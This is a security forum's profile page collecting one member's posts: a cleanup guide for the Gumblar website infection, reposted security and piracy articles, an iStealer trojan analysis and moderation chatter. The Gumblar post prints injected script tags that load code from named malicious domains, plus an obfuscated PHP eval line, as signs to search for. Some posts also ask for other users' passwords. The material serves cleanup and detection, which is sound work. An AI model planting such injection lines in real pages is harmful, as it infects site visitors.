Jump to content

begood

Active Members
  • Posts

    3972
  • Joined

  • Last visited

  • Days Won

    22

Everything posted by begood

  1. If you have a web site and you want it to be secure, the first place you have protect is your desktop. Recently (well, since 2009), a large number of sites have been infected with malware and blacklisted due to a few desktop virus (generally called Gumblar, port 8080, etc). These virus steals your FTP password and does the following things: Infects all .js files on your site with entries like this one: document.write('<script src=http://wap.northernplumbingandheating.com/assets/postinfo.php'); document.write('<script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php'); It infects every .html files with entries similar to this: <script src=http://wap.northernplumbingandheating.com/assets/postinfo.php <script src=http://shopping-dubai.com/images/runActiveContent.php > <script src=http://stb-umhau.de/images/muffin35.php > <script src=http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php Every PHP file with a code similar to this one: <?php eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTF.. And also creates backdoor files called gifimg.php on multiple directories Note that the domain changes every time and this is just a small list of them: http://stb-umhau.de/images/muffin35.php http://shopping-dubai.com/images/runActiveContent.php http://wap.northernplumbingandheating.co http://salsafestival-berlin.de/_fpclass/BannerWebseite2009.php http://applebe.dothome.co.kr/bbs/fla-3.php How to clean my desktop if I have this virus? Install an anti-virus and make sure it detected and removed the problem. If it didn't, try a different one Change your FTP passwords. Start using SFTP instead of FTP Do not store your FTP/SFTP password on your desktop How to clean my site if it is infected? You can hire us to clean it up for you and monitor your sites going forward: Sucuri Security Or if you prefer to do yourself: Scan your site to see where the malware is and how it is called on your site Download your whole site to your desktop Use grep (or wingrep) and search for src=http, eval(base64_decode("aW Remove all those entries as well as the gifimg.php backdoors Re-upload your site back That should clean up your site. Note that it only applies to this type of virus (Gumblar or MW:JS:150), so if you have a different one, this clean up solution may not work completely. Sucuri Security: Web site security - It starts with your desktop
  2. begood

    sal

    sau faci o descriere, sau zbori.
  3. How big is games piracy ? There used to be three big topics that you shouldn't talk about at parties: sex, politics and religion. But now a new subject has slipped into the mix – piracy. Whether you're referring to music, movies or games – or oil tankers – this particular subject has a tendency to make everybody in the room froth at the mouth, whichever side they're on. Some advocate it, saying that it is hardly a crime when you consider how much the publishers charge for games, their increasingly awful DRM and bad after sales service. Others think it's the same as stealing a car. There are even those that think it's a silly argument about something that isn't that big a deal. No matter how you look at it, piracy is the topic du jour. It has been blamed for the decline of the PC gaming industry, terrorism, the collapse of businesses and pretty much anything else that you can think of, but there still doesn't seem to be any hard facts about the true impact on the industry. Certainly there have been big figures thrown about in the media, but they haven't been very specific and don't take many important factors into consideration. Add in stringent DRM measures that have legitimate gamers taking most of the strain, the vociferous debate over how these measures are implemented, plus a pervasive attitude of 'yo ho ho and a bottle of rum' and you have a keg of dynamite that everybody keeps throwing matches into. In this article we've spoken to publishers, developers, government organisations and even to pirates themselves to find out exactly what the truth is, and why we should care. What is piracy? It's really difficult to pin the subject of PC gaming piracy down. There is so much conflicting information out there that it's no wonder people go around in circles trying to find some kind of answer. For one thing, everyone has a different opinion and conflicting evidence about how the industry is being affected. A recent report from the Entertainment Software Association said that over 9.78 million games were successfully downloaded illegally during the month of December 2009. However, these figures only represent 200 games that were accessed on the most popular peer-to-peer platforms like BitTorrent, eDonkey, Gnutella and Ares. They also neglect to mention the legitimate sales figures for those same titles in that same month. In 2008, after the demise of Iron Lore Entertainment, Michael Fitch, director of creative management at THQ, posted some interesting facts on the Quarter To Three forums. "The research I've seen pegs the piracy rate at between 70 to 85 per cent on PC in the US, 90 per cent plus in Europe, off the charts in Asia." MODERN WARFARE 2: The pirates choice in 2009. An estimated 4.1m copies were downloaded in a mere two months He goes on to say that, "I didn't believe it at first. It seemed way too high. Then I saw that Bioshock was selling 5 to 1 on console vs PC, and Call of Duty 4 was selling 10 to 1. Given the difference in install base, I can't believe that there's that big a difference in who played these games, but I guess there can be in who actually paid for them." Having a seizure John Hillier, Intellectual Property Crime Unit manager at ELSPA says, "Have we made a difference? I think because we have difficulty quantifying levels of piracy it's hard to say. I haven't seen an increase year on year on the seizures [of pirates/pirated goods], so I think at the moment we are just holding back the tide. I don't think it's gone down and I don't think it's gone up – the levels of seizures are staying fairly constant and that's the only measure I have." ELSPA offer a view from the other side of the coin as they focus on the more physical aspects of piracy – master discs and circumvention devices – and most of their figures relate to console-based piracy. The problem is that the same answer was received across the board when we asked what the impact PC game piracy was having on the industry. According to the Entertainment Software Association, the video game industry lost about three billion dollars in 2007 and the Business Software Alliance put the losses to companies for software piracy (all forms of software) at around $53 billion. These figures are frustratingly vague, though, as you can't guarantee that every pirated copy is a lost sale. In 2008 a study by Reflexive showed that for every 1,000 attempts to stop piracy, they got one additional sale. This isn't exactly a case for pirates roaring down the high street destroying small businesses in a single bound. Nihal de Silva of Direct2Drive says, "It's difficult to say what effect piracy is having on the industry as a whole. PC gaming has long been thought of as an industry in decline, with sales of boxed PC games falling sharply as consoles became the weapon of choice for the modern gamer. Without the availability of an official digital chart, however, this message is skewed." Sailing the torrents It would be very interesting to see publisher revenues and DRM statistics. Solutions like Steam don't release figures for games sold, nor do we know their success rates regarding piracy, yet these solutions are becoming increasingly popular and many of the developers that use them are still claiming considerable losses from piracy. What seems to be lacking most is reliable information. One way of assessing the approximate scale of piracy for PC games is to look at the torrents for the pirated releases of recent big-name games – although this does ignore the other forms of piracy including physical copying. According to TorrentFreak, the clear winner for 2009 was Call of Duty: Modern Warfare 2 with 4.1 million pirated downloads in November and December 2009 – a shocking number when compared to the estimated PC sales of 300,000 in November, of which approximately 53,000 were for the UK in that same month. Unfortunately when you compare this to the console, the figures for November 2009 are almost completely reversed, with six million copies selling legitimately and 970,000 pirated. The numbers were almost identical across all the top ten titles. With piracy results like these there is little wonder that publishers are more likely to take their money to the console, it makes better financial sense. It is interesting to note that none of the big name video game publishers were interested in being interviewed for this feature. EA, 2K Games, Ubisoft and Valve either ignored all calls or sent a standard "no comment". This does raise the point – if they are so overwhelmingly concerned with piracy, why aren't they interested in speaking out and providing us with detailed facts and figures on the true impact of piracy on their bottom line? Is DRM the answer ? DRM Nasty Colin Dwan, project manager at MMORPG, Fallen Earth, said. "While piracy has definitely been a pain in the rear end for the game industry, I believe it's actually made us evolve and be more creative in certain ways. Instead of just lashing out with overbearing DRM, more modern games are starting to embrace features that the internet provides to actually encourage legitimate buyers." Well, if using the internet to prevent piracy means going down the Ubisoft route then perhaps this is not the solution you've been looking for. This system demands that you remain connected to the internet while playing the game so that the servers can check you're playing an authorised version. If you lose your internet connection, you lose your game. While Ubisoft have listed several advantages to this new system, the disadvantages are pretty clear, and it really doesn't take into account countries like South Africa where the internet is patchy at best. In fact it is more likely to spur on piracy in those developing countries that have poor internet and high piracy rates. This is especially poignant in light of the fact that Ubisoft's DRM servers went down on March 2007, crippling the legitimate customers while the pirates happily carried on playing. Nice way to incentivise your customers there. DRM solutions like this are used as one of the leading excuses by people abandoning the good ship legitimacy for the high seas of piracy. "Media companies mistakenly believe that piracy can be stopped by DRM," says Ernesto, founding father of TorrentFreak, "but it is one of the main sources of piracy. DRM is easily circumvented and in reality it only hurts the people who bought the product. There are many cases where people wanted to buy the product but, because of the tight restrictions, they chose to pirate instead so they can use the product freely." ASSASSINS CREED: Assassin's Creed 2 was thought to be the victim of massive piracy Statistics for games like World of Goo, Crysis and Assassin's Creed beg to differ, however. These games have none of the DRM attachments and restrictions that pirates cry about when copying that master disc for their mates. World of Goo is the critically acclaimed title by indie developer 2D Boy. It's available for digital download, sells for a pittance and is DRM free. This game should, according to the wailing of pirates, be completely safe from piracy. Instead co-creator Ron Carmel was quoted as saying that the game was being pirated at the rate of about 90 per cent (based on the unique IP addresses to every sale of the game). Many pirates are driven merely by the desire to crack the latest system: "There's the excitement and challenge of taking on the big guy and wrecking his day, and it's a bit of a middle finger to the people that want to make your life more difficult," says Fallen Earth's Colin Dwan. "I don't think many legitimate buyers fall into this category as much as wanting to just have an easier time playing their game." Nihal de Silva has an astute counter-argument: "We don't think that the limitations of DRM drive an existing PC software customer to playing pirated games. To successfully download and install a cracked game is a skill in itself as the customer needs to use a number of different programs to access the content, crack and install it on their system." He agrees that DRM is an issue and said that, "We recently ran a user survey on D2D UK and the majority of users polled (70 per cent) would be more likely to purchase a DRM-free title over one that had DRM wrapping. That said, we haven't seen any sales patterns to indicate that our customers are specifically not buying games because of their DRM." While this may be a fair point, PC games are suffering under the yolk of DRM. Recent titles like Grand Theft Auto IV, demand that you install Games for Windows, Adobe Flash, SecuROM and the Rockstar Games Social Club application, plus you have to activate it over the internet, all before you can even think of playing. When you consider that such titles have been released on the console months earlier and that you only need slip the disc into your console to play, there is little doubt as to why PC games are being affected by a lot more than just the pirates. Rocky ground The loss of revenue is not only affected by pirates cracking DRM and making the games available for download or copying. Many have built-in protection systems, like Batman: Arkham Asylum or Portal, that result in a glitch or game fail when played illegally. Naturally the pirates that experience these issues publicly slate the game, other gamers assume its poor quality so they don't buy a copy and the game is dead before it's even had a chance, before it is even released in some cases. THQ's Michael Fitch puts it succinctly, "So, before the game even comes out, we've got people bad mouthing it because their pirated copies crash, even though a legitimate copy won't. How many people decided to pick up the pirated version because it had this reputation and they didn't want to risk buying something that didn't work?" Chicken and the egg. Not only that, but pirates have the audacity to contact the game's support centres to get help for bugs and issues that are clearly the result of playing pirated games. The developers of Portal: Prelude had this to say about the subject on their site in 2008: "Seriously guys, stop sending us emails because you can't install the game, because you can't launch the game or because you have weird errors everywhere. We're not going to help you make the mod work on pirated versions of Portal or without Steam." It's hard to feel sympathy for pirates claiming that games are too expensive. If you can afford a PC that runs the latest games then surely you can afford the games themselves? "I think quite a few people use piracy to sample a game and buy it if they like it," claims TorrentFreak's Ernesto, "There are also people who download it illegally because they have a limited budget. However", he reasons "these people would still not have bought the game if there was no piracy." YOU SAY POTATO: ELSPA hates the flippancy of the term 'piracy' and calls it 'IP Crime', instead Oh, right, so that makes it okay then does it. But what about other those common pirate excuses such as poor quality games? "There are a few examples of large franchises that put their titles on auto-pilot and I can understand player frustration with these companies," says Colin Dwan, "But that is the extreme, not the norm when it comes to video games. The vast majority of game developers are working around the clock to put together quality entertainment. You can argue that you don't like the end product, but don't try to claim that they aren't pouring their heart and soul into the game you just got for a few bucks." John Hillier is almost rabid on this issue, having served time at the Trading Standards Authority. "Anybody who makes a copy of something only cares about making money. No matter what you charge they will always be cheaper because they are not paying taxes, not contributing anything to society." Making games is not easy. The market is competitive and not all developers are backed by the big guns. "Yes, you're going to get some big games making fortunes but there are a lot of games that don't make a fortune," explains Hillier, "If people don't buy them then they lose out and their investment is gone." What next? "I think we need to accept that pirates aren't going to be scared away by extensive DRM," admits Colin Dwan, "Once we embrace that the marketplace has changed, we can design our games to be more effective." New models are being introduced – for instance the micro-transactions that may well pave the way for a new pirate-free future. Still, there are no clear-cut solutions to the issue. If people stop using pirated copies then the phenomenon will likely come to a natural end but, for this to start happening, the industry has to be more transparent. Gamers, in the main, are not stupid, so vague comments about terrorism or billions of pounds worth of losses are only going to deepen their scepticism. The situation demands honesty. Honesty about the figures quoted to the media and more information about digital distribution and what the regional splits are. If the industry is more forthcoming about how these figures are reached and what problems they face, as well as how the money is invested into new PC franchises and development, then the public is more likely to stop doubting and start listening. If piracy is rampant in countries like China or Zimbabwe compared with the US and the UK, then introduce systems specific to those countries and stop expecting gamers in the latter countries to suffer extreme anti-piracy solutions. Ultimately, the core truth about piracy is that there is no apparent truth. The industry is reluctant to speak up, offer hard facts and deliver solid evidence of wrong doings, and pirates spit out increasingly specious arguments in favour of their illegal activities. What is clear is that piracy is a negative force in the industry and that transparency may well be a step in the right direction. Read more: The truth about PC game piracy | News | TechRadar UK
  4. frate, nu te tratez nicicum, vreau doar username-ul si parola de la cei doi, ii poti ruga frumos sa ti-o dea si sa-si schimbe parola apoi. E foarte interesanta chestia descoperita ! //am tendinta sa explic cat mai detaliat. asta nu inseamna ca te subestimez, e din obisnuinta.
  5. 05-26-2010, 02:55 PM http://rstcenter.com/forum/22981-vid-first-human-infected-computer-virus.rst folositi functia search inainte de a posta.
  6. te auzi ? @Shocker utopia
  7. eu nu cred ca ai doua coliziuni ia mai verifica tu algoritmul tau, ma prea indoiesc ca e sha1(username : password) gandeste-te. sansele sa se intample asta sunt 1 la 2^53 1 : 9007199254740992 mai degraba e sha1 (password) sau mysql5(password). verifica facand un cont nou cu parola "aaaaa", vezi hashul din baza de date si compara-l cu datele generate aici. asa poti fi sigur de algoritmul folosit.
  8. Bizploit is the first Opensource ERP Penetration Testing framework. Developed by the Onapsis Research Labs, Bizploit assists security professionals in the discovery, exploration, vulnerability assessment and exploitation phases of specialized ERP Penetration Tests. Currently, Bizploit is shipped with many plugins to assess the security of SAP business platforms. Plugins for other popular ERPs will be included in the short term. Download Bizploit v1.00-rc1 for Windows Download Bizploit v1.00-rc1 for Linux Onapsis | Research Labs
  9. vreau parolele roaga-i sa ti le trimita, e interesanta chestia ! don't worry i don't give a fuck about their accounts.
  10. Google is refusing to let new employees use Windows PCs over fears about its security. New recruits are given the choice of running Mac OS X or Linux PCs, while many existing staff are migrating from Windows, according to a report in the Financial Times. The move follows the high profile attacks on Google at the end of last year, in which a hole in Internet Explorer was exploited by Chinese hackers. "We’re not doing any more Windows," a Google employee told the FT. "It is a security effort.” “Many people have been moved away from [Windows] PCs, mostly towards Mac OS, following the China hacking attacks,” said another unnamed Google worker. “Linux is open source and we feel good about it. Microsoft we don’t feel so good about.” Employees requiring a Windows PCs for tasks such as software testing are now required to seek high-level permission. "Getting a new Windows machine now requires CIO approval,” a company employee claimed. Google is, of course, currently developing its own alternative to Windows, Chrome OS. The lightweight OS is little more than a web browser that is heavily reliant on internet services, such as Google Docs, Gmail and Reader. The company eventually wants its 10,000 employees to be running on the home-made OS. "A lot of it is an effort to run things on Google product,” a Google source told the FT. “They want to run things on Chrome.” Read more: Google ditches Windows after security scare | Security | News | PC Pro http://www.pcpro.co.uk/news/security/358321/google-ditches-windows-after-security-scare
  11. ?i o cântare s? mear? cu l?pticu' dl dl2
  12. da, doi ratati ce folosesc aceeasi parola. probabil in genul 123456 sau iloveyourmata
  13. unchiu din partea lu tati, ala cu bani
  14. A clickjacking worm that forced hundreds of thousands of unsuspecting Facebook users to unknowingly post spam messages on their profiles, rapidly spread through the social networking website over the weekend. The worm used catchy news headlines to lure its victims into the trap. Clickjacking is a Web attack technique that involves hijacking users' mouse clicks on a page (hence its name) and using them to trigger unauthorized actions. The attack is technically known as user interface (UI) redressing because it hides a clickable object, such as a button, by making it transparent and superimposing it over a non-dangerous looking one. Though not new, the technique was only brought into the public attention last year, when reputed Web security researchers Jeremiah Grossman and Robert Hansen disclosed some critical attacks based on it. One of them allowed ill-intent hackers to turn on a computer's Web camera and microphone by exploiting a bug in the Flash Player Settings Manager. The latest Facebook worm seems to be a proof of concept, becuase it does nothing destructive and its only purpose is to propagate. The offending messages posted on its victims' profiles are based on real and catchy news topics from the past several months. "LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE", "This man takes a picture of himself EVERYDAY for 8 YEARS!!", "The Prom Dress That Got This Girl Suspended From School", or "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!" are some of the examples. Clicking on the messages takes users to external pages hosted at blogspot.com, which only display a text that reads "Click here to continue." However, clicking anywhere on the page abuses a user's active Facebook session to publishing a spam message back to his profile. "The trick, which uses a clickjacking exploit, means that visiting users are tricked into 'liking' a page without necessarily realising they are recommending it to all of their Facebook friends. […] If you believe you may have been hit by this attack, view the recent activity on your news feed and delete entries related to the above links. Furthermore, you should view your profile, click on your Info tab and remove any of the pages from your 'Likes and interests' section," advises Graham Cluley, senior technology consultant at Sophos, who's antivirus products detect this threat as Troj/Iframe-ET. To protect themselves, Mozilla Firefox users can install and use NoScript, a browser extension, which includes protection against clickjacking attacks, amongst others. Clickjacking Worm Hits Facebook - Affects hundreds of thousands of users - Softpedia
  15. in gara, ma prostituez de 9 ani juma' 2 curci in loc de pesti iar locul de refugiu e cu 10 etaje peste biroul lui nytro.
  16. e criptat cu "blackout". il detecteaza doar doua antivirusuri. Virustotal. MD5: d6acdbb607687ed703eda2ae92ba2ad3 Trojan/Win32.Chifrax.gen Hacktool.Blackout-1 ban pe toate conturile. cysero, pax, unhacker. 89.48.58.171 ip stabil. _)_
  17. ce vedeti sus e afisat in urmatorul mod : C:\iStealer 6.exe /AutoIt3ExecuteLine "MsgBox('64', 'Version expired on 18.05.2010', 'Version expired.Please update')" pe langa activitatile din registrii adauga un executabil in C:\WINDOWS\Explorer32DLL.exe si se autoexecuta la startup. are (cred) si keylogger incorporat. mai multe : Anubis - Analysis Report 5. Postarea de programe hexate sau facute in intregime din surse luate de pe net fara a preciza aceste lucruri se taxeaza cu BAN. Hassan BAN permanent.
  18. One of the many reasons people choose Linux on the desktop and the server is security. Linux has a reasonably good track record when it comes to security, but it's not enough to simply take that for granted. If you're new to using, administering or developing for Linux, you need to know a few things about security. You don't need to be a security expert to use or work with Linux, but it is important and it's something everybody needs to be aware of. Whether you use Linux for work or play (or both), some basic security principles apply. If you've been using Linux for a while professionally or even as a hobby, you're probably aware already -- but lots of new users pick up Linux every day with a bunch of misconceptions about security, or without thinking about it at all. Linux is Not Immune to Everything A Linux distribution is more secure than Windows out of the box. Not because all the software on a Linux system is free of security vulnerabilities, but because you'll find fewer exploits for those vulnerabilities. You will find lots of security reports that claim Windows or Linux are "more secure" because of the number of reported vulnerabilities. You can interpret the numbers pretty much any way you want to come up with the conclusion that either OS is "more secure." What isn't disputable, however, is that you'll find fewer exploits like Conficker targeting Linux. But fewer, is not none. One of the mistakes often made by new Linux enthusiasts and junior admins is to think that Linux is immune to security exploits. That's just not so. The difference is in where the weak spots are, how exploits are deployed, and what kind of attacks you should be concerned about. Desktop users are still vulnerable to some browser-based exploits, for example. Lots of Linux servers are compromised by root kits (applications designed to give the attacker full control of a system), delivered in a variety of ways. Even if a system isn't rooted, services can be disrupted. Worms like Santy can deface sites and use a server as a springboard to attack other sites. The bottom line is that it's vitally important to realize that Linux systems can be vulnerable to attack, and that you need to think about system security whether you're a desktop user or administering servers. But You Don't Need an Antivirus If you're just coming off of Windows, you might wonder where the antivirus programs are for Linux. Relax; you don't need one. This might sound like it contradicts with the previous point, but it only means that Linux doesn't need things like McAfee Antivirus or Norton Antivirus. A lot of users are surprised by the lack of AV products for Linux, but Linux doesn't have problems with the same kind of viruses and malware that Windows does. You can install one if you want, and if you're looking I'd recommend ClamAV. But most likely you'd find nothing that is a threat to your system. ClamAV will scan for known trojans, viruses, etc. that largely affect Windows systems. It might help you find an infected file that would harm a Windows system, but odds are you're not going to be finding any Linux viruses that come in via email or documents today. What kind of threats do Linux users face? Typically attacks via network services, like worms and Cross-site scripting attacks that work on any browser on any OS. And social engineering works on any platform. Phishing attempts, that is attempts to get users to supply personal and financial information, rely on a user being fooled by an email or Web site. While Firefox, Google Chrome, and other applications have some anti-phishing features, common sense is the only real protection for those attacks. Prevention is Better than Cure I'd much rather spend 15 to 45 minutes a week tending to security than two days recovering from a security breach. Being proactive is remarkably easy, and I strongly recommend that any user or admin get into a few habits very quickly. First, subscribe to your vendor's security list. You should be notified of known problems quickly and potential fixes. You'll see quite a few emails on this list if the project or vendor is doing its job. This also goes for third-party software that you run on top of Linux but don't get through the distribution's repositories. Any third party software of significance should have a security list of some sort or a channel that it uses to announce security updates. Note that security updates come through distributions a bit more slowly than through the upstream vendors at times. For instance, a security update for Firefox may go directly to users who get Firefox from Mozilla a few days before the updates show up in packages for major Linux distributions. Second, run updates regularly. Daily if possible, weekly at a minimum. Make sure you're running your updates regularly, and updating third-party software that isn't patched through your update tools. Understand User Permissions and Encryption Part of prevention is making sure your system is locked down. Ubuntu and openSUSE feature AppArmor for users who want to enhance system security and lock down services. Fedora uses SELinux. Familiarize yourself with those tools and try to ensure that system services are locked down, or not running at all if they're not necessary. Make sure you understand the permissions system for Linux and that files are not more accessible than necessary. This is particularly important on multi-user systems. If you're running services on a shared hosting service, this is really important. Running Linux on your home PC, netbook or laptop? Think about encrypting your home partition. If someone has physical access to your machine they don't need to know your root or user passwords to get at your data when it's not encrypted. Audit and Use Intrusion Detection Finally, consider very strongly taking the time to install intrusion detection on any server that you're administering, and using tools like chkrootkit to verify that your system is not compromised. It's not at all unusual for a system to be compromised without any obvious signs. Some attackers deface Web sites or use an exploited system to launch attacks on other systems. Others quietly collect passwords or data without ever making too much noise, or run services like IRC bots or use infected systems to send spam. If you're administering a server, look into installing and using Tripwire and Snort for intrusion detection. And, I hope this goes without saying, keep backups. No, backups aren't necessarily part of a security regime, but they're part of recovery if you are unfortunate enough to suffer a successful attack. As far as I know, no one has ever regretted taking the time to do good backups, but the reverse is not true. Summary The most important thing is to be aware that security is not a feature; it's a process. More than that, it's a process that requires user participation. If you want a secure system, picking Linux is a good first step, but not the end of the line. Follow the general guidelines here, and you'll be on your way to more informed and secure computing. Since security is deeply important, in the weeks to come we'll feature more tutorials on using tools like AppArmor or setting up intrusion detection to keep your systems safe. If there's a particular topic you'd like to see covered, be sure to tell us about it in the comments! http://www.linux.com/news/enterprise/systems-management/305234-five-things-to-know-about-linux-security-
  19. Here is the new article explaining about password secrets of some of the popular applications. It is going to explain about the password locations, storage techniques and encryption mechanism used by these applications. This application list has all category of applications such as Internet Browsers, Email Clients, Instant Messengers etc. Some of prominent applications include Firefox, IE, Chrome, GTalk, Trillion, Pidgin, Digsby, Outlook, Thunderbird, AIM, Paltalk, Picasa etc. In today’s Internet driven world, all of use one or other applications starting from browsers, mail clients to instant messengers. Most of these applications store the sensitive information such as user name, password in their private location using proprietary methods.But most applications use simple methods or rather obscure methods to store the credentials which can easily put your privacy in jeopardy as any spyware on your system can easily uncover these secrets. In this context, this article is going to throw a light on those dark regions by exposing the secret storage location and encryption mechanism used by most popular applications. It is also going to present the pointers on how one can uncover such passwords using the tools available today. To know where and how each of these popular applications stores the passwords, read on to the research article ‘Password Secrets of Popular Windows Applications’ http://nagareshwar.securityxploded.com/2010/05/31/password-secrets-of-popular-windows-applications/
  20. cat de frumos, sex in grup
  21. begood is za best antivirus.
  22. Ce ziceti sa fac una sau mai multe imagini iso, separate de RSTcore, care sa contina software ? Astfel veti putea folosi kit-urile si pe sistemul vostru de operare, fiind o chestie super utila. Le voi face de 4.7 GB pentru a va incape pe un DVD. Iar RSTcore nu va fi decat un simplu sistem de operare XP, care papa resurse minime si e foarte stabil. Asta ca prima versiune. A doua versiune sa contina programele deja instalate. Ma mai gandesc.
  23. da, faza e ca prima versiune am considerat-o alfa, de testare, inca nu am publicat "oficial" nimic. Cand termin de organizat pachetul, sa am si timp, atunci voi lansa prima versiune de RSTcore.
×
×
  • Create New...